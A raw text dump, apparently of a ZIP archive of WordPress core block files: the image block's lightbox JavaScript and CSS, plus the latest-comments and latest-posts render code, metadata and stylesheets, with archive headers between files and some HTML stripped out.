${E};\n\t\t}\n\t`}(0,o.h)({state:{core:{image:{windowWidth:window.innerWidth,windowHeight:window.innerHeight}}},actions:{core:{image:{showLightbox:({context:e,event:t})=>{e.core.image.imageLoaded&&(e.core.image.initialized=!0,e.core.image.lastFocusedElement=window.document.activeElement,e.core.image.scrollDelta=0,e.core.image.pointerType=t.pointerType,e.core.image.lightboxEnabled=!0,g(e,e.core.image.imageRef),e.core.image.scrollTopReset=window.pageYOffset||document.documentElement.scrollTop,e.core.image.scrollLeftReset=window.pageXOffset||document.documentElement.scrollLeft,a=l.bind(null,e),window.addEventListener("scroll",a,!1))},hideLightbox:async({context:e})=>{e.core.image.hideAnimationEnabled=!0,e.core.image.lightboxEnabled&&(setTimeout((function(){window.removeEventListener("scroll",a),e.core.image.lightboxTriggerRef.focus({preventScroll:!0})}),450),e.core.image.lightboxEnabled=!1)},handleKeydown:({context:e,actions:t,event:i})=>{e.core.image.lightboxEnabled&&("Tab"!==i.key&&9!==i.keyCode||(i.shiftKey&&window.document.activeElement===e.core.image.firstFocusableElement?(i.preventDefault(),e.core.image.lastFocusableElement.focus()):i.shiftKey||window.document.activeElement!==e.core.image.lastFocusableElement||(i.preventDefault(),e.core.image.firstFocusableElement.focus())),"Escape"!==i.key&&27!==i.keyCode||t.core.image.hideLightbox({context:e,event:i}))},handleLoad:({context:e,effects:t,ref:i})=>{e.core.image.imageLoaded=!0,e.core.image.imageCurrentSrc=i.currentSrc,t.core.image.setButtonStyles({context:e,ref:i})},handleTouchStart:()=>{r=!0},handleTouchMove:({context:e,event:t})=>{e.core.image.lightboxEnabled&&t.preventDefault()},handleTouchEnd:()=>{c=Date.now(),r=!1}}}},selectors:{core:{image:{roleAttribute:({context:e})=>e.core.image.lightboxEnabled?"dialog":null,ariaModal:({context:e})=>e.core.image.lightboxEnabled?"true":null,dialogLabel:({context:e})=>e.core.image.lightboxEnabled?e.core.image.dialogLabel:null,lightboxObjectFit:({context:e})=>{if(e.core.image.initialized)return"cover"},enlargedImgSrc:({context:e})=>e.core.image.initialized?e.core.image.imageUploadedSrc:"data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs="}}},effects:{core:{image:{initOriginImage:({context:e,ref:t})=>{e.core.image.imageRef=t,e.core.image.lightboxTriggerRef=t.parentElement.querySelector(".lightbox-trigger"),t.complete&&(e.core.image.imageLoaded=!0,e.core.image.imageCurrentSrc=t.currentSrc)},initLightbox:async({context:e,ref:t})=>{if(e.core.image.lightboxEnabled){const i=t.querySelectorAll(n);e.core.image.firstFocusableElement=i[0],e.core.image.lastFocusableElement=i[i.length-1],t.focus()}},setButtonStyles:({context:e,ref:t})=>{const{naturalWidth:i,naturalHeight:o,offsetWidth:n,offsetHeight:a}=t;if(0===i||0===o)return;const r=t.parentElement,c=t.parentElement.clientWidth;let l=t.parentElement.clientHeight;const g=r.querySelector("figcaption");if(g){const e=window.getComputedStyle(g);l=l-g.offsetHeight-parseFloat(e.marginTop)-parseFloat(e.marginBottom)}const d=l-a,m=c-n;if("contain"===e.core.image.scaleAttr){const t=i/o;if(t>=n/a){const i=n/t;e.core.image.imageButtonTop=(a-i)/2+d+16,e.core.image.imageButtonRight=m+16}else{const i=a*t;e.core.image.imageButtonTop=d+16,e.core.image.imageButtonRight=(n-i)/2+m+16}}else e.core.image.imageButtonTop=d+16,e.core.image.imageButtonRight=m+16},setStylesOnResize:({state:e,context:t,ref:i})=>{t.core.image.lightboxEnabled&&(e.core.image.windowWidth||e.core.image.windowHeight)&&g(t,i)}}}}},{afterLoad:({state:e})=>{window.addEventListener("resize",function(e,t=50){let i;return()=>{const o=()=>{i=null,e()};clearTimeout(i),i=setTimeout(o,t)}}((()=>{e.core.image.windowWidth=window.innerWidth,e.core.image.windowHeight=window.innerHeight})))}})}},function(e){var t;t=699,e(e.s=t)}]);PK6[)v image/style-rtl.cssnu[.wp-block-image img{ box-sizing:border-box; height:auto; max-width:100%; vertical-align:bottom; } .wp-block-image[style*=border-radius] img,.wp-block-image[style*=border-radius]>a{ border-radius:inherit; } .wp-block-image.has-custom-border img{ box-sizing:border-box; } .wp-block-image.aligncenter{ text-align:center; } .wp-block-image.alignfull img,.wp-block-image.alignwide img{ height:auto; width:100%; } .wp-block-image .aligncenter,.wp-block-image .alignleft,.wp-block-image .alignright,.wp-block-image.aligncenter,.wp-block-image.alignleft,.wp-block-image.alignright{ display:table; } .wp-block-image .aligncenter>figcaption,.wp-block-image .alignleft>figcaption,.wp-block-image .alignright>figcaption,.wp-block-image.aligncenter>figcaption,.wp-block-image.alignleft>figcaption,.wp-block-image.alignright>figcaption{ caption-side:bottom; display:table-caption; } .wp-block-image .alignleft{ float:left; margin:.5em 1em .5em 0; } .wp-block-image .alignright{ float:right; margin:.5em 0 .5em 1em; } .wp-block-image .aligncenter{ margin-left:auto; margin-right:auto; } .wp-block-image figcaption{ margin-bottom:1em; margin-top:.5em; } .wp-block-image .is-style-rounded img,.wp-block-image.is-style-circle-mask img,.wp-block-image.is-style-rounded img{ border-radius:9999px; } @supports ((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){ .wp-block-image.is-style-circle-mask img{ border-radius:0; -webkit-mask-image:url('data:image/svg+xml;utf8,'); mask-image:url('data:image/svg+xml;utf8,'); mask-mode:alpha; -webkit-mask-position:center; mask-position:center; -webkit-mask-repeat:no-repeat; mask-repeat:no-repeat; -webkit-mask-size:contain; mask-size:contain; } } .wp-block-image :where(.has-border-color){ border-style:solid; } .wp-block-image :where([style*=border-top-color]){ border-top-style:solid; } .wp-block-image :where([style*=border-right-color]){ border-left-style:solid; } .wp-block-image :where([style*=border-bottom-color]){ border-bottom-style:solid; } .wp-block-image :where([style*=border-left-color]){ border-right-style:solid; } .wp-block-image :where([style*=border-width]){ border-style:solid; } .wp-block-image :where([style*=border-top-width]){ border-top-style:solid; } .wp-block-image :where([style*=border-right-width]){ border-left-style:solid; } .wp-block-image :where([style*=border-bottom-width]){ border-bottom-style:solid; } .wp-block-image :where([style*=border-left-width]){ border-right-style:solid; } .wp-block-image figure{ margin:0; } .wp-lightbox-container{ display:flex; flex-direction:column; position:relative; } .wp-lightbox-container img{ cursor:zoom-in; } .wp-lightbox-container img:hover+button{ opacity:1; } .wp-lightbox-container button{ align-items:center; -webkit-backdrop-filter:blur(16px) saturate(180%); backdrop-filter:blur(16px) saturate(180%); background-color:rgba(90,90,90,.25); border:none; border-radius:4px; cursor:zoom-in; display:flex; height:20px; justify-content:center; left:16px; opacity:0; padding:0; position:absolute; text-align:center; top:16px; transition:opacity .2s ease; width:20px; z-index:100; } .wp-lightbox-container button:focus-visible{ outline:3px auto rgba(90,90,90,.25); outline:3px auto -webkit-focus-ring-color; outline-offset:3px; } .wp-lightbox-container button:hover{ cursor:pointer; opacity:1; } .wp-lightbox-container button:focus{ opacity:1; } .wp-lightbox-container button:focus,.wp-lightbox-container button:hover,.wp-lightbox-container button:not(:hover):not(:active):not(.has-background){ background-color:rgba(90,90,90,.25); border:none; } .wp-lightbox-overlay{ box-sizing:border-box; cursor:zoom-out; height:100vh; overflow:hidden; position:fixed; right:0; top:0; visibility:hidden; width:100vw; z-index:100000; } .wp-lightbox-overlay .close-button{ align-items:center; cursor:pointer; display:flex; justify-content:center; left:calc(env(safe-area-inset-left) + 16px); min-height:40px; min-width:40px; padding:0; position:absolute; top:calc(env(safe-area-inset-top) + 16px); z-index:5000000; } .wp-lightbox-overlay .close-button:focus,.wp-lightbox-overlay .close-button:hover,.wp-lightbox-overlay .close-button:not(:hover):not(:active):not(.has-background){ background:none; border:none; } .wp-lightbox-overlay .lightbox-image-container{ height:var(--wp--lightbox-container-height); overflow:hidden; position:absolute; right:50%; top:50%; transform:translate(50%, -50%); transform-origin:top right; width:var(--wp--lightbox-container-width); z-index:9999999999; } .wp-lightbox-overlay .wp-block-image{ align-items:center; box-sizing:border-box; display:flex; height:100%; justify-content:center; margin:0; position:relative; transform-origin:100% 0; width:100%; z-index:3000000; } .wp-lightbox-overlay .wp-block-image img{ height:var(--wp--lightbox-image-height); min-height:var(--wp--lightbox-image-height); min-width:var(--wp--lightbox-image-width); width:var(--wp--lightbox-image-width); } .wp-lightbox-overlay .wp-block-image figcaption{ display:none; } .wp-lightbox-overlay button{ background:none; border:none; } .wp-lightbox-overlay .scrim{ background-color:#fff; height:100%; opacity:.9; position:absolute; width:100%; z-index:2000000; } .wp-lightbox-overlay.active{ animation:turn-on-visibility .25s both; visibility:visible; } .wp-lightbox-overlay.active img{ animation:turn-on-visibility .35s both; } .wp-lightbox-overlay.hideanimationenabled:not(.active){ animation:turn-off-visibility .35s both; } .wp-lightbox-overlay.hideanimationenabled:not(.active) img{ animation:turn-off-visibility .25s both; } @media (prefers-reduced-motion:no-preference){ .wp-lightbox-overlay.zoom.active{ animation:none; opacity:1; visibility:visible; } .wp-lightbox-overlay.zoom.active .lightbox-image-container{ animation:lightbox-zoom-in .4s; } .wp-lightbox-overlay.zoom.active .lightbox-image-container img{ animation:none; } .wp-lightbox-overlay.zoom.active .scrim{ animation:turn-on-visibility .4s forwards; } .wp-lightbox-overlay.zoom.hideanimationenabled:not(.active){ animation:none; } .wp-lightbox-overlay.zoom.hideanimationenabled:not(.active) .lightbox-image-container{ animation:lightbox-zoom-out .4s; } .wp-lightbox-overlay.zoom.hideanimationenabled:not(.active) .lightbox-image-container img{ animation:none; } .wp-lightbox-overlay.zoom.hideanimationenabled:not(.active) .scrim{ animation:turn-off-visibility .4s forwards; } } @keyframes turn-on-visibility{ 0%{ opacity:0; } to{ opacity:1; } } @keyframes turn-off-visibility{ 0%{ opacity:1; visibility:visible; } 99%{ opacity:0; visibility:visible; } to{ opacity:0; visibility:hidden; } } @keyframes lightbox-zoom-in{ 0%{ transform:translate(calc((-50vw + var(--wp--lightbox-initial-left-position))*-1), calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale)); } to{ transform:translate(50%, -50%) scale(1); } } @keyframes lightbox-zoom-out{ 0%{ transform:translate(50%, -50%) scale(1); visibility:visible; } 99%{ visibility:visible; } to{ transform:translate(calc((-50vw + var(--wp--lightbox-initial-left-position))*-1), calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale)); visibility:hidden; } }PK6[KL8Vimage/style.cssnu[.wp-block-image img{ box-sizing:border-box; height:auto; max-width:100%; vertical-align:bottom; } .wp-block-image[style*=border-radius] img,.wp-block-image[style*=border-radius]>a{ border-radius:inherit; } .wp-block-image.has-custom-border img{ box-sizing:border-box; } .wp-block-image.aligncenter{ text-align:center; } .wp-block-image.alignfull img,.wp-block-image.alignwide img{ height:auto; width:100%; } .wp-block-image .aligncenter,.wp-block-image .alignleft,.wp-block-image .alignright,.wp-block-image.aligncenter,.wp-block-image.alignleft,.wp-block-image.alignright{ display:table; } .wp-block-image .aligncenter>figcaption,.wp-block-image .alignleft>figcaption,.wp-block-image .alignright>figcaption,.wp-block-image.aligncenter>figcaption,.wp-block-image.alignleft>figcaption,.wp-block-image.alignright>figcaption{ caption-side:bottom; display:table-caption; } .wp-block-image .alignleft{ float:left; margin:.5em 1em .5em 0; } .wp-block-image .alignright{ float:right; margin:.5em 0 .5em 1em; } .wp-block-image .aligncenter{ margin-left:auto; margin-right:auto; } .wp-block-image figcaption{ margin-bottom:1em; margin-top:.5em; } .wp-block-image .is-style-rounded img,.wp-block-image.is-style-circle-mask img,.wp-block-image.is-style-rounded img{ border-radius:9999px; } @supports ((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){ .wp-block-image.is-style-circle-mask img{ border-radius:0; -webkit-mask-image:url('data:image/svg+xml;utf8,'); mask-image:url('data:image/svg+xml;utf8,'); mask-mode:alpha; -webkit-mask-position:center; mask-position:center; -webkit-mask-repeat:no-repeat; mask-repeat:no-repeat; -webkit-mask-size:contain; mask-size:contain; } } .wp-block-image :where(.has-border-color){ border-style:solid; } .wp-block-image :where([style*=border-top-color]){ border-top-style:solid; } .wp-block-image :where([style*=border-right-color]){ border-right-style:solid; } .wp-block-image :where([style*=border-bottom-color]){ border-bottom-style:solid; } .wp-block-image :where([style*=border-left-color]){ border-left-style:solid; } .wp-block-image :where([style*=border-width]){ border-style:solid; } .wp-block-image :where([style*=border-top-width]){ border-top-style:solid; } .wp-block-image :where([style*=border-right-width]){ border-right-style:solid; } .wp-block-image :where([style*=border-bottom-width]){ border-bottom-style:solid; } .wp-block-image :where([style*=border-left-width]){ border-left-style:solid; } .wp-block-image figure{ margin:0; } .wp-lightbox-container{ display:flex; flex-direction:column; position:relative; } .wp-lightbox-container img{ cursor:zoom-in; } .wp-lightbox-container img:hover+button{ opacity:1; } .wp-lightbox-container button{ align-items:center; -webkit-backdrop-filter:blur(16px) saturate(180%); backdrop-filter:blur(16px) saturate(180%); background-color:rgba(90,90,90,.25); border:none; border-radius:4px; cursor:zoom-in; display:flex; height:20px; justify-content:center; opacity:0; padding:0; position:absolute; right:16px; text-align:center; top:16px; transition:opacity .2s ease; width:20px; z-index:100; } .wp-lightbox-container button:focus-visible{ outline:3px auto rgba(90,90,90,.25); outline:3px auto -webkit-focus-ring-color; outline-offset:3px; } .wp-lightbox-container button:hover{ cursor:pointer; opacity:1; } .wp-lightbox-container button:focus{ opacity:1; } .wp-lightbox-container button:focus,.wp-lightbox-container button:hover,.wp-lightbox-container button:not(:hover):not(:active):not(.has-background){ background-color:rgba(90,90,90,.25); border:none; } .wp-lightbox-overlay{ box-sizing:border-box; cursor:zoom-out; height:100vh; left:0; overflow:hidden; position:fixed; top:0; visibility:hidden; width:100vw; z-index:100000; } .wp-lightbox-overlay .close-button{ align-items:center; cursor:pointer; display:flex; justify-content:center; min-height:40px; min-width:40px; padding:0; position:absolute; right:calc(env(safe-area-inset-right) + 16px); top:calc(env(safe-area-inset-top) + 16px); z-index:5000000; } .wp-lightbox-overlay .close-button:focus,.wp-lightbox-overlay .close-button:hover,.wp-lightbox-overlay .close-button:not(:hover):not(:active):not(.has-background){ background:none; border:none; } .wp-lightbox-overlay .lightbox-image-container{ height:var(--wp--lightbox-container-height); left:50%; overflow:hidden; position:absolute; top:50%; transform:translate(-50%, -50%); transform-origin:top left; width:var(--wp--lightbox-container-width); z-index:9999999999; } .wp-lightbox-overlay .wp-block-image{ align-items:center; box-sizing:border-box; display:flex; height:100%; justify-content:center; margin:0; position:relative; transform-origin:0 0; width:100%; z-index:3000000; } .wp-lightbox-overlay .wp-block-image img{ height:var(--wp--lightbox-image-height); min-height:var(--wp--lightbox-image-height); min-width:var(--wp--lightbox-image-width); width:var(--wp--lightbox-image-width); } .wp-lightbox-overlay .wp-block-image figcaption{ display:none; } .wp-lightbox-overlay button{ background:none; border:none; } .wp-lightbox-overlay .scrim{ background-color:#fff; height:100%; opacity:.9; position:absolute; width:100%; z-index:2000000; } .wp-lightbox-overlay.active{ animation:turn-on-visibility .25s both; visibility:visible; } .wp-lightbox-overlay.active img{ animation:turn-on-visibility .35s both; } .wp-lightbox-overlay.hideanimationenabled:not(.active){ animation:turn-off-visibility .35s both; } .wp-lightbox-overlay.hideanimationenabled:not(.active) img{ animation:turn-off-visibility .25s both; } @media (prefers-reduced-motion:no-preference){ .wp-lightbox-overlay.zoom.active{ animation:none; opacity:1; visibility:visible; } .wp-lightbox-overlay.zoom.active .lightbox-image-container{ animation:lightbox-zoom-in .4s; } .wp-lightbox-overlay.zoom.active .lightbox-image-container img{ animation:none; } .wp-lightbox-overlay.zoom.active .scrim{ animation:turn-on-visibility .4s forwards; } .wp-lightbox-overlay.zoom.hideanimationenabled:not(.active){ animation:none; } .wp-lightbox-overlay.zoom.hideanimationenabled:not(.active) .lightbox-image-container{ animation:lightbox-zoom-out .4s; } .wp-lightbox-overlay.zoom.hideanimationenabled:not(.active) .lightbox-image-container img{ animation:none; } .wp-lightbox-overlay.zoom.hideanimationenabled:not(.active) .scrim{ animation:turn-off-visibility .4s forwards; } } @keyframes turn-on-visibility{ 0%{ opacity:0; } to{ opacity:1; } } @keyframes turn-off-visibility{ 0%{ opacity:1; visibility:visible; } 99%{ opacity:0; visibility:visible; } to{ opacity:0; visibility:hidden; } } @keyframes lightbox-zoom-in{ 0%{ transform:translate(calc(-50vw + var(--wp--lightbox-initial-left-position)), calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale)); } to{ transform:translate(-50%, -50%) scale(1); } } @keyframes lightbox-zoom-out{ 0%{ transform:translate(-50%, -50%) scale(1); visibility:visible; } 99%{ visibility:visible; } to{ transform:translate(calc(-50vw + var(--wp--lightbox-initial-left-position)), calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale)); visibility:hidden; } }PK6[- index.phpnu[ $attributes['commentsToShow'], 'status' => 'approve', 'post_status' => 'publish', ) ) ); $list_items_markup = ''; if ( ! empty( $comments ) ) { // Prime the cache for associated posts. This is copied from \WP_Widget_Recent_Comments::widget(). $post_ids = array_unique( wp_list_pluck( $comments, 'comment_post_ID' ) ); _prime_post_caches( $post_ids, strpos( get_option( 'permalink_structure' ), '%category%' ), false ); foreach ( $comments as $comment ) { $list_items_markup .= '
  • '; if ( $attributes['displayAvatar'] ) { $avatar = get_avatar( $comment, 48, '', '', array( 'class' => 'wp-block-latest-comments__comment-avatar', ) ); if ( $avatar ) { $list_items_markup .= $avatar; } } $list_items_markup .= '
    '; $list_items_markup .= ''; if ( $attributes['displayExcerpt'] ) { $list_items_markup .= '
    ' . wpautop( get_comment_excerpt( $comment ) ) . '
    '; } $list_items_markup .= '
  • '; } } $classnames = array(); if ( $attributes['displayAvatar'] ) { $classnames[] = 'has-avatars'; } if ( $attributes['displayDate'] ) { $classnames[] = 'has-dates'; } if ( $attributes['displayExcerpt'] ) { $classnames[] = 'has-excerpts'; } if ( empty( $comments ) ) { $classnames[] = 'no-comments'; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classnames ) ) ); return ! empty( $comments ) ? sprintf( '
      %2$s
    ', $wrapper_attributes, $list_items_markup ) : sprintf( '
    %2$s
    ', $wrapper_attributes, __( 'No comments to show.' ) ); } /** * Registers the `core/latest-comments` block. */ function register_block_core_latest_comments() { register_block_type_from_metadata( __DIR__ . '/latest-comments', array( 'render_callback' => 'render_block_core_latest_comments', ) ); } add_action( 'init', 'register_block_core_latest_comments' ); PK6[4)=latest-posts/block.jsonnu[{ "apiVersion": 2, "name": "core/latest-posts", "category": "widgets", "attributes": { "categories": { "type": "array", "items": { "type": "object" } }, "selectedAuthor": { "type": "number" }, "postsToShow": { "type": "number", "default": 5 }, "displayPostContent": { "type": "boolean", "default": false }, "displayPostContentRadio": { "type": "string", "default": "excerpt" }, "excerptLength": { "type": "number", "default": 55 }, "displayAuthor": { "type": "boolean", "default": false }, "displayPostDate": { "type": "boolean", "default": false }, "postLayout": { "type": "string", "default": "list" }, "columns": { "type": "number", "default": 3 }, "order": { "type": "string", "default": "desc" }, "orderBy": { "type": "string", "default": "date" }, "displayFeaturedImage": { "type": "boolean", "default": false }, "featuredImageAlign": { "type": "string", "enum": [ "left", "center", "right" ] }, "featuredImageSizeSlug": { "type": "string", "default": "thumbnail" }, "featuredImageSizeWidth": { "type": "number", "default": null }, "featuredImageSizeHeight": { "type": "number", "default": null }, "addLinkToFeaturedImage": { "type": "boolean", "default": false } }, "supports": { "align": true, "html": false }, "editorStyle": "wp-block-latest-posts-editor", "style": "wp-block-latest-posts" } PK6[0rlatest-posts/editor.min.cssnu[.wp-block-latest-posts{padding-left:2.5em}.wp-block-latest-posts.is-grid{padding-left:0}.wp-block-latest-posts>li{overflow:hidden}.wp-block-latest-posts li a>div{display:inline}.edit-post-visual-editor .wp-block-latest-posts.is-grid li{margin-bottom:20px}.editor-latest-posts-image-alignment-control .components-base-control__label{display:block}.editor-latest-posts-image-alignment-control .components-toolbar{border-radius:2px}PK6[b:xxlatest-posts/style-rtl.min.cssnu[.wp-block-latest-posts{box-sizing:border-box}.wp-block-latest-posts.alignleft{margin-right:2em}.wp-block-latest-posts.alignright{margin-left:2em}.wp-block-latest-posts.wp-block-latest-posts__list{list-style:none;padding-right:0}.wp-block-latest-posts.wp-block-latest-posts__list li{clear:both}.wp-block-latest-posts.is-grid{display:flex;flex-wrap:wrap;padding:0}.wp-block-latest-posts.is-grid li{margin:0 0 1.25em 1.25em;width:100%}@media (min-width:600px){.wp-block-latest-posts.columns-2 li{width:calc(50% - .625em)}.wp-block-latest-posts.columns-2 li:nth-child(2n){margin-left:0}.wp-block-latest-posts.columns-3 li{width:calc(33.33333% - .83333em)}.wp-block-latest-posts.columns-3 li:nth-child(3n){margin-left:0}.wp-block-latest-posts.columns-4 li{width:calc(25% - .9375em)}.wp-block-latest-posts.columns-4 li:nth-child(4n){margin-left:0}.wp-block-latest-posts.columns-5 li{width:calc(20% - 1em)}.wp-block-latest-posts.columns-5 li:nth-child(5n){margin-left:0}.wp-block-latest-posts.columns-6 li{width:calc(16.66667% - 1.04167em)}.wp-block-latest-posts.columns-6 li:nth-child(6n){margin-left:0}}.wp-block-latest-posts__post-author,.wp-block-latest-posts__post-date{display:block;font-size:.8125em}.wp-block-latest-posts__post-excerpt{margin-bottom:1em;margin-top:.5em}.wp-block-latest-posts__featured-image a{display:inline-block}.wp-block-latest-posts__featured-image img{height:auto;max-width:100%;width:auto}.wp-block-latest-posts__featured-image.alignleft{float:left;margin-right:1em}.wp-block-latest-posts__featured-image.alignright{float:right;margin-left:1em}.wp-block-latest-posts__featured-image.aligncenter{margin-bottom:1em;text-align:center}PK6[Gslatest-posts/editor.cssnu[.wp-block-latest-posts{ padding-left:2.5em; } .wp-block-latest-posts.is-grid{ padding-left:0; } .wp-block-latest-posts>li{ overflow:hidden; } .wp-block-latest-posts li a>div{ display:inline; } .edit-post-visual-editor .wp-block-latest-posts.is-grid li{ margin-bottom:20px; } .editor-latest-posts-image-alignment-control .components-base-control__label{ display:block; } .editor-latest-posts-image-alignment-control .components-toolbar{ border-radius:2px; }PK6[||latest-posts/style.min.cssnu[.wp-block-latest-posts{box-sizing:border-box}.wp-block-latest-posts.alignleft{margin-right:2em}.wp-block-latest-posts.alignright{margin-left:2em}.wp-block-latest-posts.wp-block-latest-posts__list{list-style:none;padding-left:0}.wp-block-latest-posts.wp-block-latest-posts__list li{clear:both}.wp-block-latest-posts.is-grid{display:flex;flex-wrap:wrap;padding:0}.wp-block-latest-posts.is-grid li{margin:0 1.25em 1.25em 0;width:100%}@media (min-width:600px){.wp-block-latest-posts.columns-2 li{width:calc(50% - .625em)}.wp-block-latest-posts.columns-2 li:nth-child(2n){margin-right:0}.wp-block-latest-posts.columns-3 li{width:calc(33.33333% - .83333em)}.wp-block-latest-posts.columns-3 li:nth-child(3n){margin-right:0}.wp-block-latest-posts.columns-4 li{width:calc(25% - .9375em)}.wp-block-latest-posts.columns-4 li:nth-child(4n){margin-right:0}.wp-block-latest-posts.columns-5 li{width:calc(20% - 1em)}.wp-block-latest-posts.columns-5 li:nth-child(5n){margin-right:0}.wp-block-latest-posts.columns-6 li{width:calc(16.66667% - 1.04167em)}.wp-block-latest-posts.columns-6 li:nth-child(6n){margin-right:0}}.wp-block-latest-posts__post-author,.wp-block-latest-posts__post-date{display:block;font-size:.8125em}.wp-block-latest-posts__post-excerpt{margin-bottom:1em;margin-top:.5em}.wp-block-latest-posts__featured-image a{display:inline-block}.wp-block-latest-posts__featured-image img{height:auto;max-width:100%;width:auto}.wp-block-latest-posts__featured-image.alignleft{float:left;margin-right:1em}.wp-block-latest-posts__featured-image.alignright{float:right;margin-left:1em}.wp-block-latest-posts__featured-image.aligncenter{margin-bottom:1em;text-align:center}PK6[8Nflatest-posts/editor-rtl.cssnu[.wp-block-latest-posts{ padding-right:2.5em; } .wp-block-latest-posts.is-grid{ padding-right:0; } .wp-block-latest-posts>li{ overflow:hidden; } .wp-block-latest-posts li a>div{ display:inline; } .edit-post-visual-editor .wp-block-latest-posts.is-grid li{ margin-bottom:20px; } .editor-latest-posts-image-alignment-control .components-base-control__label{ display:block; } .editor-latest-posts-image-alignment-control .components-toolbar{ border-radius:2px; }PK6[[latest-posts/editor-rtl.min.cssnu[.wp-block-latest-posts{padding-right:2.5em}.wp-block-latest-posts.is-grid{padding-right:0}.wp-block-latest-posts>li{overflow:hidden}.wp-block-latest-posts li a>div{display:inline}.edit-post-visual-editor .wp-block-latest-posts.is-grid li{margin-bottom:20px}.editor-latest-posts-image-alignment-control .components-base-control__label{display:block}.editor-latest-posts-image-alignment-control .components-toolbar{border-radius:2px}PK6[.hviilatest-posts/style-rtl.cssnu[.wp-block-latest-posts{ box-sizing:border-box; } .wp-block-latest-posts.alignleft{ margin-right:2em; } .wp-block-latest-posts.alignright{ margin-left:2em; } .wp-block-latest-posts.wp-block-latest-posts__list{ list-style:none; padding-right:0; } .wp-block-latest-posts.wp-block-latest-posts__list li{ clear:both; } .wp-block-latest-posts.is-grid{ display:flex; flex-wrap:wrap; padding:0; } .wp-block-latest-posts.is-grid li{ margin:0 0 1.25em 1.25em; width:100%; } @media (min-width:600px){ .wp-block-latest-posts.columns-2 li{ width:calc(50% - .625em); } .wp-block-latest-posts.columns-2 li:nth-child(2n){ margin-left:0; } .wp-block-latest-posts.columns-3 li{ width:calc(33.33333% - .83333em); } .wp-block-latest-posts.columns-3 li:nth-child(3n){ margin-left:0; } .wp-block-latest-posts.columns-4 li{ width:calc(25% - .9375em); } .wp-block-latest-posts.columns-4 li:nth-child(4n){ margin-left:0; } .wp-block-latest-posts.columns-5 li{ width:calc(20% - 1em); } .wp-block-latest-posts.columns-5 li:nth-child(5n){ margin-left:0; } .wp-block-latest-posts.columns-6 li{ width:calc(16.66667% - 1.04167em); } .wp-block-latest-posts.columns-6 li:nth-child(6n){ margin-left:0; } } .wp-block-latest-posts__post-author,.wp-block-latest-posts__post-date{ display:block; font-size:.8125em; } .wp-block-latest-posts__post-excerpt{ margin-bottom:1em; margin-top:.5em; } .wp-block-latest-posts__featured-image a{ display:inline-block; } .wp-block-latest-posts__featured-image img{ height:auto; max-width:100%; width:auto; } .wp-block-latest-posts__featured-image.alignleft{ float:left; margin-right:1em; } .wp-block-latest-posts__featured-image.alignright{ float:right; margin-left:1em; } .wp-block-latest-posts__featured-image.aligncenter{ margin-bottom:1em; text-align:center; }PK6[c,mmlatest-posts/style.cssnu[.wp-block-latest-posts{ box-sizing:border-box; } .wp-block-latest-posts.alignleft{ margin-right:2em; } .wp-block-latest-posts.alignright{ margin-left:2em; } .wp-block-latest-posts.wp-block-latest-posts__list{ list-style:none; padding-left:0; } .wp-block-latest-posts.wp-block-latest-posts__list li{ clear:both; } .wp-block-latest-posts.is-grid{ display:flex; flex-wrap:wrap; padding:0; } .wp-block-latest-posts.is-grid li{ margin:0 1.25em 1.25em 0; width:100%; } @media (min-width:600px){ .wp-block-latest-posts.columns-2 li{ width:calc(50% - .625em); } .wp-block-latest-posts.columns-2 li:nth-child(2n){ margin-right:0; } .wp-block-latest-posts.columns-3 li{ width:calc(33.33333% - .83333em); } .wp-block-latest-posts.columns-3 li:nth-child(3n){ margin-right:0; } .wp-block-latest-posts.columns-4 li{ width:calc(25% - .9375em); } .wp-block-latest-posts.columns-4 li:nth-child(4n){ margin-right:0; } .wp-block-latest-posts.columns-5 li{ width:calc(20% - 1em); } .wp-block-latest-posts.columns-5 li:nth-child(5n){ margin-right:0; } .wp-block-latest-posts.columns-6 li{ width:calc(16.66667% - 1.04167em); } .wp-block-latest-posts.columns-6 li:nth-child(6n){ margin-right:0; } } .wp-block-latest-posts__post-author,.wp-block-latest-posts__post-date{ display:block; font-size:.8125em; } .wp-block-latest-posts__post-excerpt{ margin-bottom:1em; margin-top:.5em; } .wp-block-latest-posts__featured-image a{ display:inline-block; } .wp-block-latest-posts__featured-image img{ height:auto; max-width:100%; width:auto; } .wp-block-latest-posts__featured-image.alignleft{ float:left; margin-right:1em; } .wp-block-latest-posts__featured-image.alignright{ float:right; margin-left:1em; } .wp-block-latest-posts__featured-image.aligncenter{ margin-bottom:1em; text-align:center; }PK6[latest-posts.phpnu[ $attributes['postsToShow'], 'post_status' => 'publish', 'order' => $attributes['order'], 'orderby' => $attributes['orderBy'], 'suppress_filters' => false, ); $block_core_latest_posts_excerpt_length = $attributes['excerptLength']; add_filter( 'excerpt_length', 'block_core_latest_posts_get_excerpt_length', 20 ); if ( isset( $attributes['categories'] ) ) { $args['category__in'] = array_column( $attributes['categories'], 'id' ); } if ( isset( $attributes['selectedAuthor'] ) ) { $args['author'] = $attributes['selectedAuthor']; } $recent_posts = get_posts( $args ); $list_items_markup = ''; foreach ( $recent_posts as $post ) { $post_link = esc_url( get_permalink( $post ) ); $list_items_markup .= '
  • '; if ( $attributes['displayFeaturedImage'] && has_post_thumbnail( $post ) ) { $image_style = ''; if ( isset( $attributes['featuredImageSizeWidth'] ) ) { $image_style .= sprintf( 'max-width:%spx;', $attributes['featuredImageSizeWidth'] ); } if ( isset( $attributes['featuredImageSizeHeight'] ) ) { $image_style .= sprintf( 'max-height:%spx;', $attributes['featuredImageSizeHeight'] ); } $image_classes = 'wp-block-latest-posts__featured-image'; if ( isset( $attributes['featuredImageAlign'] ) ) { $image_classes .= ' align' . $attributes['featuredImageAlign']; } $featured_image = get_the_post_thumbnail( $post, $attributes['featuredImageSizeSlug'], array( 'style' => $image_style, ) ); if ( $attributes['addLinkToFeaturedImage'] ) { $featured_image = sprintf( '%2$s', $post_link, $featured_image ); } $list_items_markup .= sprintf( '
    %2$s
